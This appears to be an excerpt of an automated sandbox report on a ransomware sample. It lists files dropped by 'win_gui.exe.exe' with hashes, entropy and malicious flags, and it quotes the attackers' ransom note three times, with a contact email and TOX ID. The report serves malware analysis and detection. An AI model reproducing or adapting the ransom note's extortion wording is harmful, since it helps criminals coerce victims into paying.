                                SHA-512:B7C3D94394D3D81F6ADCDAA17488F9D34FDBEF6102E45F222AFDBBCAD5E58B8110535CA68B3E0FC67ED6A3DBD8CF911537E0D7E76460552496CF042CFEDCDD9D
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22118
                                Entropy (8bit):7.990206503294256
                                Encrypted:true
                                SSDEEP:384:TGzXDsB7zDlznHUyfbAdQ9Dl0ErrAy0ZMvz2PiMl9vDFcDJBr+eUP7S4BruI+hlF:TkTsBdHUyfbAdQXfws49vACVP3BruXPF
                                MD5:9753376BA3F73A2A0B39B0F14DD0A397
                                SHA1:3F487AC1EDDD574F5188E765AEF8E85C7AC9A966
                                SHA-256:85CA1977149AF1B2A0956553CD3FDE64221BC162DE62066154120107621E2D8F
                                SHA-512:A36F563B5E15EC959607FFE01D742720CA56C7766DCFE5C0B4362C96D8C1B9B0498E3496BBDEC604B445C5FCC99F9EF589757442A162B80453522745CCAA6D71
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14831
                                Entropy (8bit):7.987045338436014
                                Encrypted:false
                                SSDEEP:384:fsngrTVXsni/rWBSFTmHeN8qMCfWI/rTSfKAPxu2+zZ+VOP:RtsOrW+qHPqvOI/fEKb2+zZ7
                                MD5:69604DBC1506C4A3224D024C2158ADED
                                SHA1:09169F93CA1E75C60B6E83DC9C753F4E415BCE02
                                SHA-256:ACFE38285286844888286D48484F37460038EFEA5196AD8908DC181D3024D572
                                SHA-512:C5973E947E4E1BB62B335C68B5E510368C81F51F1DDE5A9D161BA095F802E9659ED223BAD4FB9627F69DA100D8655950F55B551222813C9EF976DEDB50D270F1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):77237
                                Entropy (8bit):7.997643885981981
                                Encrypted:true
                                SSDEEP:1536:V5TUm4BbwyLpZD1awVeWSgecQ5MF0iHVd0sN2rz0gWTu9PkbsyKDeqXY4:V5TfGAdXJ55MF0iPdsrzAuNcKDeP4
                                MD5:7346C9D2EB98AC1075346703DECC8928
                                SHA1:1D26E6E6866C90EBA8EA72432C10236783F81FB2
                                SHA-256:7ABC1C0465643D5EFC880C750C81FA5867C7F52EE30C3C0A5526DE468A966A87
                                SHA-512:82E9BE820F0D6945BE604C751833636E3FECD9A5C3C37FF5563CFCB49120EC2D5F61043641756283CAE3B89B9352B2C454977BF69186CEF5F2DA7324E03B37D2
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):35679
                                Entropy (8bit):7.994921127201841
                                Encrypted:true
                                SSDEEP:768:3B0wgAmKWDgjLyOrqFl2CMgBEE2xQFCX5aymigojkPHVPaq1:NJkgj2Qq0Y70QYwymR1L
                                MD5:C70F74B728F81348721FF3A5F0E7F7D3
                                SHA1:1362BBF0A5B3CB02916F044DB7450D4EF2779849
                                SHA-256:A500DE3C420FDEA4721CD03F67E4DD7F97ABEA28D6DA729ECAB8F27C0D59AAF4
                                SHA-512:BD71CC39EF3E09CF3EB05A41503C379ABD9FE82F7282558457121CC0A710428399CABF283473899FE7BA0CDA92537BECA64418F371BDBB8FED951DDC34020E7C
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):38984
                                Entropy (8bit):7.995551107013911
                                Encrypted:true
                                SSDEEP:768:FAb2yKLIdr3OMqjIiCXxL7JfKtq14bOgDP9Be:3LKreMqj2xL5Eq6btDPu
                                MD5:C24155123912F79D83770B34DC14F774
                                SHA1:7E7FF4C6E5D56F127848BFE34F6DFF49B307E626
                                SHA-256:626AE14D43F7D4659BA5456AB4EA79625498265B18336AE9AF9DAF2567C5703E
                                SHA-512:F4FCCF9E7C0E5C31F85124F2B922CFD7BFD7BF52D0897620A2A5450AB6F9338CAAA94E94F0AE6107E0D6343539CDBE7F9D3B3E65E6FB06C54170D95CE438D423
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45110
                                Entropy (8bit):7.99567981422741
                                Encrypted:true
                                SSDEEP:768:4g4PTMQ9KM3DkxVjidsoRarLFOAlIeEWw1f1mCLmoYgwx1Osykl90+q:4Z/97DqUdsoRGLoASeUx1xmZg61Osyke
                                MD5:FD29DCBE15C9E332B676FFCCDD174B7B
                                SHA1:33652E8C84860F98B1E3B5C853E6ED38DDB056FC
                                SHA-256:9D8AC44E2DD6BD1E979D2E2B2AF418B982F2E7F537259FBE7909302DE43A6FCC
                                SHA-512:ADF690D0D4A7E952C4131891ABEF87E770ECC7B8903A9E50DA4C821464BF9FC153192847789182065C74AD6042B9F0E4CAB74F8D54CDAB03DDA5E5CE2FE71442
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):43041
                                Entropy (8bit):7.996224052476002
                                Encrypted:true
                                SSDEEP:768:+EharlTbhn0CpXecGIU3hEYKKjQujfYhg6vm03Fy3GAzBFXHbdKH6MynJg2mC:bWBn0IhOhE1kQujfYbvVFQ1FXxsmg2h
                                MD5:7D1665A1790A327D64F06619B7587CAE
                                SHA1:D5E2D7E20B3F2CB3A10C6E1493F43515DCB686CD
                                SHA-256:2EE479729E4780F1C4E78D5E737F3AF391A39A44F853CEDFF516156AC2AE906F
                                SHA-512:ECD9963E19E44C17DF83C4A3551A4B9D6CEBE983E8558C550B9FF12D6208A3E1AED2A8806C748939D4E61AA8E245613C48197CD14DAB2BAF1EA8B5CF569BF9D9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):78202
                                Entropy (8bit):7.997756107228158
                                Encrypted:true
                                SSDEEP:1536:FMh8tqY2qLOzI4hAd5u5rd0PPKK4/1pC2ZDo1U9SqTDlR:iTY2y2IqKe00tpvDrDlR
                                MD5:24233943B7B8B1FD94D72A6152057C73
                                SHA1:586C1D0A1F74D22A202E28D8798D936198D4C2D2
                                SHA-256:10AC3A1641BC41D16184766C45F7A989021614757FA546349E96D9B0EB79E847
                                SHA-512:CB83CBF78340EF759C94B09491D2CF3C08106C738922C4B05D4D340B58DBD3EE4E96B534177225516C7D0D9D1A5AEB6A6F4C1AC1C56388F2148DC826184648E8
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28699
                                Entropy (8bit):7.993136863460101
                                Encrypted:true
                                SSDEEP:768:e4GxgW0PRBlfN7X5ycjdVKpYCuSmb8+vufXrtJ:et05d7F2pYCu6/f
                                MD5:F932A11B4954C664991767791003591B
                                SHA1:CB0258F139F1BC7489D0202BC8841D4E5BD7A230
                                SHA-256:51E2CB97B17955DF7F613821BABED7858E3A46C7CF64DF36D9C7E657A72D7F25
                                SHA-512:E47EF7BF7DCAEEACC27E76C2603C2F6AEABF9D18F54225C0480344BFA259C93393980547F9B83921C946E6D6A6A057DFE3C071AF6A4AFC630C032C3F7D7E9059
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):59065
                                Entropy (8bit):7.997113050116395
                                Encrypted:true
                                SSDEEP:1536:PqLlcryUBAjN2zAsO9Iv4duCmyKlKHjrQGQqlCi:yGBAjoA5ev9kT1FYi
                                MD5:E750745D0B4B11DAA75565E42843A8E1
                                SHA1:C616D2DE9A3A4D1B655AFB3BFC0941B131E28B04
                                SHA-256:B2B185D64D526199527FD8AB802642A63639755B0EAAF0A4EC11AC4F167BBF9B
                                SHA-512:04A4B80F02B5214846E8D4E24F978C2248D8C958872102DA537C105A6611B392F4BABD8B2BB502EFF35ADD6FC195C1831C282738AF43BC369BE1BF1C099377F2
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):42453
                                Entropy (8bit):7.995573747932359
                                Encrypted:true
                                SSDEEP:768:HAqdbccge+9bPxbsBtukUD2Wqbwp+8BndMJaGzhl+0xXZUL1YoJjCNLtNso6+:gSAFzbPxsrnUD2hbwnnG1LwYoJyDJ
                                MD5:EB2A78AAF01CA6C1A58CA8B0916B926E
                                SHA1:CE8E82E50839F354715631913199E19A49BA4B2B
                                SHA-256:53B56BBB778F79797E8582D924944F8C50702837BA25CC92ACC7FCFCFCA6EA97
                                SHA-512:4858520683108887D0412FEFCA6E4429B918956C15D61A85A68EF50725CB09C5B6DA2078BF30F3B2515D2DAD24D5468CAD1337B3A99E48B411E9D9AC37F45F9F
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8925
                                Entropy (8bit):7.978752689949959
                                Encrypted:false
                                SSDEEP:192:1/KyNwA/nAPkIMPSDFpKvOqgJY2oW50xrStPolCPP+VO7:DNikKFwvpg10xrc1P+VO7
                                MD5:EB7614060CE1E4E9100B357FD9C90347
                                SHA1:01CF4F11C57724808AE112CD3729EB50A7F34A1E
                                SHA-256:9116679FADEA7CB892D1210C6CFAA97971C928C74539C7DA0143A04B734B7B54
                                SHA-512:97B395B4E158D77DA4169F0FC70B55F18E7CEB253D9C1D420062B43DC87AE7ADED970A4E04486ADB80659FBD7096B563996C9FA0D74AA0054E7946D200F68949
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9626
                                Entropy (8bit):7.9858070233296665
                                Encrypted:false
                                SSDEEP:192:op4QZRQ3O6GiXHHVMmdyM/c+Tg052gu3kvp0JWc66yoySgNT8lZ8m1+VOG:oWQfQ3O6GCVMQ5BD2gu3+0JO3HDYlZ8h
                                MD5:196C668F69ECA312250AC487819849D3
                                SHA1:30548B6F7948BE8F02A1A8DD5B1F3698642F839E
                                SHA-256:5B12AFE011E8E02D42DBF27B02D5042C35C05D175FCB7EF5EB6537A367ADB04E
                                SHA-512:0576B46B84102FBC778C008CF7778BA6B8B58FBE8D856B1CD43F6D79C621753B5EDEF8A4653E0B8731B4B29736BFD5CBD93E9A6C436F10013296FBC24B692B83
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6867
                                Entropy (8bit):7.970007115002978
                                Encrypted:false
                                SSDEEP:96:DTq4EKb2SGL39Pik6p1AMB9kmWLdN+WvPj1ktYeCmCrt7B0IwM7E1k6WEqydevul:D1d29TBuAK9kRRtPGtYb/rZo7Wg+VORl
                                MD5:CCA8CAB2153A910A214B833891E16603
                                SHA1:0C5605265215AEEBA3ED785F7DE69B300DD1AFE9
                                SHA-256:272717E9239CE897D4D6225AB0BBCD7819325641A9EDE35F74BC1D78D5917595
                                SHA-512:6D422D95A93FE2E031500BA6E3F7331234E4EB401F0603F96647B30C72EDCE367B9A6BAEE09FBB22FC38778F38FB4DB6376D0E254682F1A7F98949DF9D8989D9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47388
                                Entropy (8bit):7.995759484423379
                                Encrypted:true
                                SSDEEP:768:RfmHq9KPPjKgkSaI1goEj5SeUaSMI3gIItJXiKUyDPz3AeKYWFnlgfiTAInAi:RfmHqEXOH68c/aSvI3UyP3AebmnKfiTP
                                MD5:F4A1F04E141A236DD5517134129D2728
                                SHA1:262552ED8696CB4D0E5DF2A34D5025D951F57485
                                SHA-256:F3575A69AF187C32139BECC5F512011EB30C983ED99EF671D1363F1436E8F112
                                SHA-512:BA239083898EFC8609FAEE6C0E532F23FB5E1733017F82F43BA9F4E59765463528128A90454258F3EC433810827EE1FC999B4977C598CDF2150A7EEDDDFC68B9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34074
                                Entropy (8bit):7.994342177268926
                                Encrypted:true
                                SSDEEP:768:dF1MIgc0Fh1Gf1GlZLgCSO/JTVYySl/fd051wt4AHxDE:dbpR0Fh0olRlbJhYyS9K5ytVHa
                                MD5:A78E25DA6D44222A9B40499B3CA0A4A1
                                SHA1:F87DAD593ECC249FE35DF7D2F986D2626346B6FB
                                SHA-256:95715C03847D0E01335F1A40E5014368F08B49C013DF235CE2C694291A9D1C58
                                SHA-512:239632071AB2E366F4CC5E7B4E98058D530A648E0397AA9BB4685A61BE4E0B676A5BC185F157516CC23953D03CDF9E0D5564CC7728AB11FDF6E4B088B0C13671
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12276
                                Entropy (8bit):7.986194181461965
                                Encrypted:false
                                SSDEEP:192:Nnd+dMnS2azSZudYvoeBnsogju7jqRlar81gnAORwaxqzA32IgPAVrgSe/PVj+VN:Nnd+dKYSZud/aYjmjqj31gnACwSqFIgu
                                MD5:4938D51A79C1731F0362506F51A47158
                                SHA1:D975477E9824E957BB6076DCF52A771B4F783D5D
                                SHA-256:72797D6B41E53F380F56A98D38CD97E87E883DBA7869EB5C91FFAE204CB4F395
                                SHA-512:A78847F9F0DDE265356F448C9EB4D8516466EB4EBA519E5833292DE582F91B6C371E1C425FE663579E52E713F4B7BD264FE871D2DAE3C93B1C543160F5DED860
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):822
                                Entropy (8bit):7.7309416836348674
                                Encrypted:false
                                SSDEEP:24:diuDCxMbNz5z/wpDyYPGTNj0hOHAVMJg6WXs9dE:dxDaezN/WyYu+MAVMJg6TU
                                MD5:AB75D8C037578B71855A1986B041C955
                                SHA1:6F69A1E249BBEC66A8095DCC1DD717F48CB4B9A7
                                SHA-256:B299327BF45E050C7F6181C07594E8DA0A3AEF871E5639CA0887E7E820C5710F
                                SHA-512:24C62F553705CAE03B8997B06AF92ACB3684C31E494AAB11BD5DFCC3FAE1CCB8F10E18D4DDF57F57EBA9AAC28D11EFD0123A9992E7C0A34D34B7867C4CF0A4A8
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):33529
                                Entropy (8bit):7.995234203898862
                                Encrypted:true
                                SSDEEP:768:9fmVrJYLP8NTGzR3oiwZqi5P9op6fKzXXeDKjnI/yjAnGkjuzrdU:9KJ80dGzZ3Cg6WHrViqK
                                MD5:FC56C9037FCEE5E6FDA29AC1EAF1BE57
                                SHA1:71C9A8E693119C02C14CEFF8A7A162D3FCF6F102
                                SHA-256:DA9F11F3AAF37C541BA4F5A4E3A8C27219759BB7BB985A016DC34FF406045AE1
                                SHA-512:B96FDE5931A52866F5DB3519A8F0E98D6D817A16D600F3D1290D0B8B6224D7D18D1325C76A0B64E5E82427CEFCCEB3A0A1320108FAB25DF628EF5E8C504CE33E
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2373216
                                Entropy (8bit):7.227069398524338
                                Encrypted:false
                                SSDEEP:49152:oSXoV72tpzOhPwi1aCvY1U2AluS0RsG4fYw44RxL2:14zwiICvYu2wIsG6W
                                MD5:AA633D4C7C9C15C6DEBB2CEC9501FDA2
                                SHA1:DA983CB71CF57066108F647AEE05236919ACEDEF
                                SHA-256:A978B83E0A4F4833BD273D7A9EE981CCB539C79F14D624345FC4AA8C2CC470C8
                                SHA-512:373E088A2543DC494E9E75F11D163C35EED36047603B4B5E15B4E3A91EF9EFFECD83C8D3E726137F5A3FC310DA1358B00D0D84C0E34795FF38C5B7CE0DCF23BE
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):92207
                                Entropy (8bit):7.997951408458284
                                Encrypted:true
                                SSDEEP:1536:RbYV+FLE0z9WZ1tOu+hsUDwoUZb4dPw2q+1XDxWr64AZrT3JU:6V+FYE+XOXwow4lwIXDRhTZU
                                MD5:696D2CA1AF57D4D618905BF094584FAC
                                SHA1:D6B2E51167FA69B34568CE3726ECD4F0973BC935
                                SHA-256:ABA72D6685AD351F397FECCF732A25E40E29CB31712DE861D5D1FBD30E2E0418
                                SHA-512:7609D7FDEBA5E11AF13B00B3A402F99729F4B7B2E1232716F31B4AE1F683483A3AA6414CBF1D2358476A42306EA26356119009B84BAB3CCFCD2DC8FB63C6307B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):72369
                                Entropy (8bit):7.997397042306235
                                Encrypted:true
                                SSDEEP:1536:NmNs1D50cNJks1xSZDfJTxtgyyK4LAuzfWzLAiyrbK0rr:ZfLjSVPiW41Xiyr3
                                MD5:55A4462794C4D62A168176F68CBC55A6
                                SHA1:F99C3A951F6C65175606567967418D6CC2607BBF
                                SHA-256:2D9F7E7EE22FE3F9C2248358AA9E6DE3690F33F1FA44FF3E7B6318EADBA17336
                                SHA-512:C1581EFCD2563780D4F4EC1E9EC97E5EA5C148C77A6B2867B86E17CDDCBA4D082FA113AAE1B58A2D55DF28B66C3418A2A3A60D6733B6424D6546B7CD3D621333
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):171232
                                Entropy (8bit):7.99877932025843
                                Encrypted:true
                                SSDEEP:3072:66tbjJoQBQYrpCQYDsa+gfih7kffgHYCwDRGNTejJMJ7XgLZIsTJh3t:6aJ5BQbRDszgqh7Hbey7XgLH/t
                                MD5:24EB09FA6E46F218CB62B6B0F8849263
                                SHA1:E8AFE1324F5929F7937490253D8F8FA691FFB678
                                SHA-256:6E04B515DA0A3792EC81DD9DF5A890B58DDE4FE43134616328AAA145F35B2850
                                SHA-512:9564896FA20B13E4784D0481EFBF62F79509813D8321254BE05609B6EDF172391470C1F06EC312CBFDF4F9A5FA792A84FFEBBF71C971D8BFEAFAB66EE95D70FC
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):66624
                                Entropy (8bit):7.997080360478528
                                Encrypted:true
                                SSDEEP:1536:Ns0EZ2y8+chPsz+181Tdx5zOVPVeTwPsxDTLaF:6zZ2Fh0aS1ZiVNrP4TLaF
                                MD5:CF9220E05F6B4F532F19CE62890BC8E3
                                SHA1:6A0E12DF092664D216B1FC065624B5F55C156FAB
                                SHA-256:07D88FDC6DAE4DD3E056353BBE9C18697D383F5EC52C9357506D1352F52E7C8E
                                SHA-512:D75CBDD69494242C56DB8431FB6D7A0F237186EE264226C073515E16B69AB3605F1DF1D2816C72BA1F1A6854952803602B944B0892ADF81FA5FA977DC06B4D1F
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12864
                                Entropy (8bit):7.986297556161904
                                Encrypted:false
                                SSDEEP:384:0XRMA4Z2zFtbva9mCBgf1P/DST+J1dKH8ZoUHX+VOI:vA+qPdCBgf1D9108ZoeX0
                                MD5:D268FFE2C40AE8A0A6879586D0CC7D00
                                SHA1:A222C77006F1BF7574BAB8179C6DE1FDE73729E4
                                SHA-256:4AC9A9994FC9FF2A0E34237C9A344200F6AB55183830B3CB57A111C9271EBABF
                                SHA-512:1E07387E89CCD26E8A58D1939B0A00DCFF63FE4ED5AD3086ECF601ED8EB9ECC36B22FDD8743A348F5847E5055664535E7EDD9A97D1F6F2C528FA1321A4E2A082
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):7.9887060938908165
                                Encrypted:false
                                SSDEEP:384:aOsn8nQ+wtdqASIopCnSiOHz9+31ZGCTDshjFt9sb4aFo8h+VOh:a7np+wtdqbTes9MJT4179RaFo8hN
                                MD5:160399FA63DABAE089ECC49717A9AA50
                                SHA1:60E741DBDB60D6CC8CB33F7F95CAA5BB58702B08
                                SHA-256:C85FD6DDCFA50BBCF63C50C77B4036442DB46C361221F504225A8EA4ADF264BC
                                SHA-512:D492753F27D80A0D1B828249D9B8417BEB8B8B25A1AEF95FB90616A23F7115447DC61A724AD11B8949BD77AB8BB1A9EEB17EC3026460F1DBB3843C4662EE6163
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17984
                                Entropy (8bit):7.989260435680841
                                Encrypted:false
                                SSDEEP:384:T1eiU5wdx3wpG2CtFtpBMjOWEWAU4cwY5FsIdoJglCOXdf5iLtMZD4jEDxP5p+VB:TfOOpcviBMnAU/X9oJ0XGO4QD95pg
                                MD5:8F944268E1221D0DE23D5502289D7F96
                                SHA1:E25B5AB7E0E7B9935C25FFEA704FEA46DB98594B
                                SHA-256:56B6B00F70C11D5F8E1CF5610979DA7C4AC933B6C9C0904310AE471A1EC1ABF1
                                SHA-512:1D47E7EE798C9F762A4D76C533B1F88A61523CECB16C376FC7B70E16D4613F65A8BB0183E3C465BE3B01094E79E9D8E83DA1DE0A88377B1F3FAD83488A1CF635
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18496
                                Entropy (8bit):7.988552136784182
                                Encrypted:false
                                SSDEEP:384:LdrbtI83SVU9leVmb60DfEIA1zHCMJzPFG5Oe8kUKe9d9MNo8gMqEDQ+VOl3:RrbKhq9leVmmccNNmUSqfd
                                MD5:AA171E4B73C2DC8058BC29FDD9AA45C0
                                SHA1:F42A03A982C880492DA01EE52E760BA2BF90C5A0
                                SHA-256:8714048B56D0C6132E9FBE06D202B66ABA125FCE89AA2C8C49EADCD3708366B2
                                SHA-512:C9E3EDC0DC26044B0F9B6AD7D7150D30741B697B9E5690BBE3CC4FECDCCD4022BE412984CD263AEE761A4D1B26A2110228DEDF4D0F56108715973D44A9E7EDDC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14400
                                Entropy (8bit):7.986587460488451
                                Encrypted:false
                                SSDEEP:384:DPuCT8a2JikFsrBwr3n5PkTnKIf1RdOrDAc+VOq:DPH49Ji+D9BKKrEcG
                                MD5:EA0DC7A7FFBFCC60CBBE8B0B02B228C6
                                SHA1:532695866055A3B9D432FD13F1FD34044325ED6D
                                SHA-256:30A74DAC7EC18FFE46672863087D7E053881D16340263F055538414AB10BD674
                                SHA-512:478C0FF4B48FA09C635993855D1708707951693BE780EEDA792F047B77C7514EB14E546FA9A59B525488D7B1AFFAD7045088B68348ECF2B45CF4677A5FBF0957
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12352
                                Entropy (8bit):7.985652231270132
                                Encrypted:false
                                SSDEEP:384:6n36ogLWbrGQ0DXgE0Lvk0/dV4FV3l8Pt+VOj:63eLvVLIg0r4FV3l8Pt/
                                MD5:E834172EC7BBD9CBE88F4FBB1C22A1F7
                                SHA1:639E4E274D0F204B0EFC2DEECF980E64BE64A365
                                SHA-256:969FBBB903626DF64C55F617658FA0114B80056A3AFBB280191F679F2ED2F7D8
                                SHA-512:9B94E30B8B4D3335C2B4CA2C04707CF015321EE1D4FBFE98CA990EE47EE00DCA53C52CC5BE06C11E6F3E63804AB651E0EFBB033949042619804AFC225EB8FCBB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1225440
                                Entropy (8bit):7.110335695382455
                                Encrypted:false
                                SSDEEP:24576:JA0qrzTILfgikyNZ0mZ/VNGqhHfaU4Y0NM+fg5LD6ipY4OxJWf3AIarI8yH5Am:4rxcC4OxJQa2HZ
                                MD5:CC4432342BB0EA9C9984D02C0E18E417
                                SHA1:F0681FE6626C26EF92427561B62C447EB8C4894A
                                SHA-256:73087A4CC8CDE3005550DFB941EB9F10BB61B96AFF81E848538642F442441C4E
                                SHA-512:3065C2B03E1FE7E4C302179665A688053A1C26006997A4B224C015EC473F3FE739D1EA21E231D415E4D03F5CCE0937329E6886332A041F786B0DB757A9937523
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22240
                                Entropy (8bit):7.9918066412935165
                                Encrypted:true
                                SSDEEP:384:R8RPpKyikMq0g34qtKfSjPTGwx2qS99KbkR7FiQRXrC7eS2Ah+VOg:6PpKyie02UKzThx21/rLTFen2Ahk
                                MD5:4965A7A05326AE1ABCD697DF17EAD004
